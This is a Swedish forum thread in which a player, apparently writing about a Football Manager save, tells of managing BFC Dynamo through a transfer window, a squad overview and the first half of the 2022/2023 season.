(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

KVALMIG NATT PÅ HOHENSCHÖNHAUSEN

TRANSFERSOMMAREN : : : Till skillnad från förra sommaren tänktes denna transfersommar bli en lugn sådan. Dessvärre hann vi inte mer in i omklädningsrummet efter den avslutande seriematchen mot Lichtenberg innan större, starkare och rikare klubbar började flockas kring våra spelare likt asätare på den afrikanska savannen. Jürgen Sparwassers tankar på en sommar i hängmattan vid sin datja kom snabbt på skam och istället blev det många långa, kvalmiga nätter på kansliet i Hohenschönhausen när de fyra spelarna Maurice Hirsch, Marvin Weiss, Luca Wesemann och inte minst Jacob Jansen tvingades säljas. Som en fånge i ett förhörsrum svettades han under lampans sken när pengarna trillade in på kontot men talangen sipprade ur klubben. Hur skulle han kunna återupprepa den gångna säsongens framgångar?

IN:

PAUL WIESE | 21 ÅR | VERTEIDIGER | 2024 | SEK 20 000 | FC HANSA ROSTOCK
“Eftersom vi tidigt gjort klart att det inte skulle bli någon ytterligare säsong för Konstantin Engel i BFC-dressen såg vi oss om efter en ytterback. En ung, billig och utvecklingsbar stod på önskelistan och honom hittade vi i Hansa Rostock. Wiese lär inte vara ordinarie redan denna säsong och kommer alternera mellan a-lag, bänk och reservlag.”

MIKE BACHMANN | 21 ÅR | STÜRMER | 2024 | SEK 15 000 | FC HANSA ROSTOCK
“Med en bra säsong i ryggen för Mathias Steinborn och en ersättare i Thierno Thioub fanns egentligen ingen plan på att plocka in ytterligare en anfallare. När Bachmanns namn dök upp blev det dock svårt att låta bli. Eftersom han är ung och kan räknas mot vårt DDR-index tas Bachmann in för att långsamt växa. Lånas eventuellt ut första säsongen.”

FLORIAN KREBS | 23 ÅR | MITTELFELDSPIELER | 2024 | SEK 35 000 | BORUSSIA DORTMUND II
“Krebs plockas in som en rak ersättare till Maurice Hirsch som flyktat för Braunschweig. Billigare och större potential prioriteras framför Hirsch nuvarande förmåga och dyrare kontrakt. Krebs troddes, av vår scout, inte vilja skriva på för oss men fel hade han och det är vi glada för.”

LUCAS GURKLYS | 21 ÅR | MITTELFELDSPIELER | 2024 | SEK 2 400 | TOGELOWER FC GREIF
“Lucas Gurklys är en mångfacetterad mittfältare som är användbar på i princip alla mittfältspositioner men enligt vårt tycke allra bäst som offensiv central sådan. Vi hade ögonen på Gurklys redan inför förra säsongen och blir nu en form av ersättare till Marvin Weiß med fördelen att Gurklys är en spelare som har en nivå och ett ego som är i nivå med klubben för tillfället.”

RUGGERO MANNES | 24 ÅR | VERTEIDIGER | 2023 | SEK 19 000 | FRI TRANSFER
“En plats för Mannes i laget aktualiserades när det stod klart att försäljningarna skulle urholka hela högerkanten. Joey Breitfeld, som används som ytterback och yttermittfältare, kommer få stöd av både Mannes och Wiese på högerbackspositionen. Kanske till och med kan vara så att Mannes, som gick klubblös hela förra säsongen, kan knipa startplatsen ute till höger. ”

JARON VICARIO | 22 ÅR | MITTELFELDSPIELER | 2024 | SEK 18 000 | FRI TRANSFER
“Även Jaron Vicario hade gått klubblös en längre tid när han rekommenderades av vår scout Mbo Mpenza. Mpenza som gärna lyfter fram sin kontakter från Benelux, en profil som inte helt gifter sig med vår vision, kunder inte tala sig nog varm om Vicario som erbjöds provspel och sedan ett tvåårskontrakt. Kommer fungera som alternativ på de offensiva yttermittfältsplatserna, något som vi saknade förra säsongen. Född i Holland men representerar Curacao i Nederländska Antillerna.”

ARNEL KUJOVIC | 20 ÅR | MITTELFELDSPIELER | SEK 10 000 | FC ENERGIE COTTBUS
“När det stod klart att vi inte kunde behålla vår kelgris Jacob Jansen kändes det tungt. Riktigt tungt ska sägas. När vi sedan ramlade över Arnel Kujovic, som av en händelse, kändes det inte lika tungt längre. Långt ifrån! Vi sätter ett stort hopp till högerfoten på vår nye, kortväxte högerytter och hoppas han ska komma skänka oss många fina fotbollsstunder!”

NILS STENDERA | 21 ÅR | MITTELFELDSPIELER | 2024 | SEK 18 000 | EINTRACHT FRANKFURT
"Nils Stendera från Kassel kommer in som rotationsspelare på mittfältet. Moritz Kretzer har haft svårt att komma i den nivå som krävs och nu kommer Stendera höja lägstastandarden på det defensiva mittfältet.”

HAKAN POLAT | 16 ÅR | VERTEIDIGER | 2023 | SEK 1 300 | BFC U19
“Var en del av intaget till ungdomsorganisationen förra säsongen. Kom upp under fjolåret och konkurrerade då ut Salimo Sylla som vänsterback. Första året som ordinarie sin ringa ålder till trots. Vi får se hur länge Polat blir kvar i laget innan han dragit till sig intresse från större klubbar”

LENNART PLAZA | 16 ÅR | MITTELFELDSPIELER | 2023 | SEK 1 300 | BFC U19
“Ytterligare en egen produkt. Kommer få sparsamt med speltid i år. Alternativt att han lånas ut. Kan spela både spela anfallare och på det centrala mittfältet var helst på banan”

BASTIAN TRÜMNER | 17 ÅR | MITTELFELDSPIELER | 2024 | SEK 1 300 | BFC U19
“Även Bastian Trümner är en egen produkt hemmahörande på mittfältet. Spännande spelare trots att det är inte hans år i år. Kommer troligtvis lånas ut”

UT:

MAURICE HIRSCH | 29 ÅR | MITTELFELDSPIELER | SEK 465 000 | EINTRACHT BRAUNSCHWEIG
“Maurice Hirsch hade ett kontrakt som gjorde det möjligt för att hitta lika bra spelare men till en lägre månadslön. Precis som allting annat handlar mycket om de ören vi kan spara. Hirsch anses ha nått kulmen på sin karriär och när Braunschweig öppnade lädret kändes det lätt att tacka ja.”

LUCA WESEMANN | 19 ÅR | MITTELFELDSPIELER | SEK 265 000 | LUCCHESE 1905
“Med Wesemann kunde vi kanske haft lite större tålamod men de tillfällen han fick chansen gav han oss inga skäl till att vi skulle ge honom någon mer. När Lucchese, i konkurrens med en annan italiensk klubb, la ett acceptabelt bud lät vi Wesemann flytta vidare.”

MARVIN WEIß | 19 ÅR | MITTELFELDSPIELER | SEK 2 750 000 | DSC ARMINIA BIELEFELD
“När buden på Weiß började hagla in gav styrelsen oss aldrig någon möjlighet att påverka och bud efter bud accepterades. Vi hade gärna behållit Weiß men 2,75 miljoner är ändå ett fint och välbehövligt tillskott för en icke-bärande spelare.”

JACOB JANSEN | 20 ÅR | MITTELFELDSPIELER | SEK 1 950 000 | PEC ZWOLLE
“Som vi befarat men in i det sista hoppats inte skulle ske kom så också buden på Jacob Jansen. Inte heller här gav styrelsen oss någon talan. Som sagt, av alla våra förluster, var Jansen den absolut tyngsta. Han gjorde skillnad och och kunde avgöra matcher på egen hand. Vi är glada att fått haft honom i vårt lag åtminstone ett år och önskar honom nu det största av lycka till när han flyttar ut i den stor fotbollsvärlden.”


   
Denki reacted
SvaraCitera
Denki
(@denki)
Active Member
Blev medlem: 4 år sedan
Inlägg: 12
 

Riktigt bra rapport!

Immer nu du, VfL Wolfsburg


   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

DIE MANNSCHAFT
Truppen säsongen 2022/2023

Dags för vår tredje säsong i klubben och det är en säsong vi går in i med en trupp med färre frågetecken än i fjol men samtidigt med ett enormt frågetecken hängande ovanför: Kan vi leva upp till fjolårets prestationer och kanske till och med överträffa dem? Styrelsen hade inte ändrat sina förväntningar på mig och på laget. De önskade sig fortfarande en plats på tabellens övre halva men mellan mig och laget, skulle vi inte till och med kunna nå uppflyttningskvalet? Vi var ju så försmädligt nära förra säsongen eller hade vi enbart överpresterat? Hur det blir med den saken återstår att se, nedan följer de som ska göra det för oss.

DIE TORWARTE
Damian Schobert | 22 år | Berlin | 1

Max Schreiber | 18 år | Berlin | 1
Kommentar: Målvaktssidan är helt och hållet oförändrad och varför skulle vi ändra på ett vinnande koncept? Damian Schobert är en fantastiskt bra målvakt som vinner matcher för oss och särskilt iögonfallande med honom är att han aldrig släpper några returer. Min enda fråga är, varför försöker ingen värva honom från oss?

DIE VERTEIDIGER
Michael Blum | 33 år | Düsseldorf | 0

Tim Böhmer | 20 år | Berlin | 1
Lukas Gerlspeck | 22 år | Forchheim | 0
Max Grundmann | 22 år | Gransee | 1
Hakan Polat | 16 år | Amasya | 0 | NY!
Ruggero Mannes | 24 år | Rotterdam | 0 | NY!
Paul Wiese | 21 år | Berlin | 1 | NY!
Bastian Trümner | 17 år | Cottbus | 1 | NY! | UTLÅNAD!
Bruno Ivic | 23 år | Osijek | 0,5 | UTLÅNAD!
Kommentar: Med vårt helgjutna mittbackspar i Böhmer och Gerlspeck finns inga skäl till oro för denna lagdel. Till höger kommer vi, med största sannolikhet, få se en alternering mellan Mannes, Wiese och Breitfeld (uppsatt som mittfältare) på högerbacken. Det allra mest spännande med backarna är att se hur vår egna produkt Hakan Polat utvecklas under säsongen.

DIE MITTELFELDSPIELER
Florian Bohnert | 24 år | Luxemburg | 0

Joey Breitfeld | 25 år | Berlin | 1
Lucas Gurklys | 21 år | Berlin | 1 | NY!
Florian Krebs | 23 år | Berlin | 1 | NY!
Moritz Kretzer | 22 år | Suhl | 1

Arnel Kujović | 21 år | Berlin | 1 | NY!
Lennart Plaza | 15 år | Berlin | 1 | NY!
Philip Schulz | 29 år | Berlin | 1

Nils Stendera | 21 år | Kassel 0 | NY!
Jaron Vicario | 22 år | Spijkenisse | 0 | NY!
Valentin Zalli | 21 år | Pristina | 0,5

Jonas Zickert | 24 år | Cottbus | 1
Kommentar: Vi fortsätter genomgången av laget bakifrån och framåt. Från start tilltänkta som defensiva mittfältare är Jonas Zickert och Florian Krebs med Nils Stendera som förste avbytare. Det är intressant med Jonas Zickert. Trots bristen på fina attribut är han alltid bra. Han är en så kallad vattenbärare, pålitlig i kubik och gör sitt jobb i det tysta. I duon på mittfältet ska Krebs dra det kreativa lasset som defensiv speluppläggare. På det offensiva mittfältet där finner vi två bekanta ansikten i form av kapten Schulz i mitten och Florian Bohnert ute till vänster. Till höger stoppar vi in vår montenegrin född i Berlin, Arnel Kujović. Han får stora skor att fylla efter Jensen. På ytterpositionerna kommer vi även se Jaron Vicario, Joey Breitfeld och Valentin Zalli med jämna mellanrum.

DIE STÜRMER
Mike Bachmann | 21 år | Berlin | 1 | NY!
Matthias Steinborn | 31 år | Berlin | 1

Thierno Thioub | 24 år | Tivaouane | 0
Kommentar: Det visade sig att Steinborn visst hade det kvar i sig under det succéartade fjolåret. Han kommer således inleda som vårt förstaval. Thioub skuggar tätt där bakom och med en ordentligt kroppshydda.  194 centimeter och 91 kilogram, är han en sådan spelartyp man gärna slänger in i slutet av matcherna. Det vill säga att kylskåp att slå höjdbollar på. Bachmann är ett framtidsnamn som eventuellt blir föremål för en utlåning innan övergångsfönstret stänger.

DDR-INDEX 65% : : : Noteringen i DDR-index är en marginell förbättring jämfört med förra säsongens 62%. Kul men samtidigt mycket kvar innan vi är nöjda. Arnel Kujović är spelare som vi fick vrida och vända på innan vi kunde ge honom någon poäng. Född inom gränserna men representerar en annan nation, ska han få 1 eller 0,5 poäng? Eftersom han de facto är född inom de gamla östtyska gränserna får han till slut 1 poäng. Nu får vi se till att finkamma området för att hitta spelare att höja vårt index med!

(DDR-index: 1 poäng till de spelare som är födda inom det gamla DDR:s gränser, 0,5 poäng åt de spelare som kommer från övrig stater med kommunistisk historia och 0 poäng till de som kommer från alla andra länder. Detta divideras sedan med antalet spelare i truppen för att kunna jämföra över olika säsonger.)


   
raca14 and Denki reacted
SvaraCitera
(@narulaprince65)
New Member
Blev medlem: 3 år sedan
Inlägg: 1
 

Really looking forward to following it. ? teatv apk spice money

This post was modified 3 år sedan by narulaprince65

   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 4 år sedan
Inlägg: 16
Topic starter  

INGET HÖSTLAG
Första delen av säsongen 2022/2023

REGIONALLIGA NORDOST : : : Säsongen rivstartade med Herta II som kom på besök till Friedrich-Ludwig-Jahn-Sportpark men det blev en match som inte levde upp till någons förhoppningar och slutade 0-0. Säsongen rullade därefter vidare och vi blandar och ger i ligan men utgör en slät figur i de bägge cuper som vi deltar i.

I mitten av augusti går vi upp mot Tennis Borussia på vår hemmaplan och där är vi precis så obarmhärtiga och precis så kliniska man kan önska sitt lag att vara. När klockan tickar in på 90 minuter står det 6-0 till varav fyra mål är gjorda av Mathias Steinborn som stänger matchen med 10,0 i snittbetyg. Definitivt hans höjdpunkt på höstsäsongen! 

September är för oss en bra månad där vi avfärdar det förmodade topplaget Chemnitz, Magdeburg och Zwickau medan vi tar med oss ett kryss mot Energie Cottbus som nu börjat få ordning på grejerna. Precis här, när vi har spelat 32 matcher utan att förlora i ligan och när vi precis ligger jämte Cottbus i tabelltoppen, börjar vi hitta vägar att förlora. Vi förlorar två matcher under hösten, först mot Babelsberg och senare också mot Fürstenwalde. Inga katastrofer i sig men i just dessa matcher känns som spelarna tappat all form av fokus och gått in i matcherna hals över huvud övertaggade. Många mål och fult spel, en straff mot Babelsberg och ett rött kort mot Fürestenwalde gör att vi efter 18 spelade matcher har ett litet hopp upp till Cottbus på förstaplatsen. Ett glapp som vi hoppats på skulle varit mycket mindre, självklart, men vi minns också vilken fantastisk vår vi hade förra säsongen och jag hoppas vi kan ikläda oss rollen som ett fantastiskt vårlag även denna säsong.

DFB-POKAL : : : I cupen hade vi hoppats på en lottning som antingen gav oss ett överkomligt motstånd alternativt ett högprofilerat lag. I Heidenheim fick vi ingetdera. Matchen som spelades på Olympiastadion i Berlin började med att Steinborn gav oss ledningen efter 20 minuter. Ett mål som föll mitt i en hänsynslös Heidenheim-press. Kanske skulle ändå kunna skrälla här? Vår lycka blev kortvarig när Heidenheim kvitterade sju minuter senare och därefter hade vi aldrig någon chans.

I Berliner Landespokal satte vi återigen förväntningarna högt. Vi skulle vinna. När lotten sedan sade Altglienicke kändes det inte längre lika självklart. Varken vi eller Altglienicke har någon brådska att avgöra matchen som går till straffar. Där drar vi det kortare strået och åker ut efter att Tim Böhmer missar sin straff i den sjätte omgången. Altglienicke har sedan finalen i förra årets distriktsmästerskap börjat växa fram som något av ett boggie-lag för oss. Två 0-0-matcher och en strafförlust sedan dess...

Spoiler
TABELL FÖRSTA HALVAN SÄSONGEN 2022/2023

AKTUELLE KAMERA

DIE MANNSCHAFT : : : Med högt ställda förväntningar inför avspark har vi inte riktigt kommit upp i den nivå jag tror detta lag besitter. Framförallt är det offensivt som det inte stämt. En anledning till detta är helt klart det tapp vi såg i Jacob Jansen men hans ersättare, Arnel Kujović, har varit bra! En annan anledning är att Philip Schultz inte alls varit lika kreativ som nav på den offensiva delen av banan. Det händer ingenting omkring honom och med en kall spelfördelare blir spelarna runt omkring honom lidande. Vi får se om vi kanske gör något åt den positionen om ekonomin så tillåter.

Vår defensiva axel i Schobert, Gerlspeck och Böhmer gör oss sällan besvikna och på vänsterkanten växer Hakan Polat för varje dag som går. Turken klockar in på ett snittbetyg på 6,81 med halva säsongen spelad och det får ses som godkänt för en 16-åring. På högerkanten har varken Ruggero Mannes eller Paul Wiese övertygat. Det har lett till att Joey Breitfeld spelat högerback allt som oftast.

Hur har det då gått för Florian Krebs som ersättare till Maurice Hirsch på det defensiva mittfältet? Inget vidare är svaret på den frågan och han har faktiskt fått se sig bänkad till Nils Stenderas fördel. Vi får se om Krebs kan lyfta sitt spel och ta tillvara på sin talang.

DIE RECHENSCHAFT : : : Ekonomin fortsätter att blomstra. Skönt att kunna skriva det! Med träningsmatcher mot Rostock, Mainz, St. Pauli och Union Berlin, alla på hemmaplan, kunde vi göra bokföra fina intäkter redan innan säsong dragit igång. Även FC Bayern har vi spelat en träningsmatch mot under ett landslagsuppehåll och då inkasserat omkring 800 000 kronor utöver deras årliga bidrag till oss. Någon ny samarbetsklubb jämte FC Bayern har vi ännu inte sett. Jag skulle önska någon toppklubb i östeuropa, kanske Sparta Prag eller Legia Warszawa men vi kanske måste spela på en högre nivå för att det skulle vara intressant för dem att samarbeta med oss.


   
Denki reacted
SvaraCitera
Share: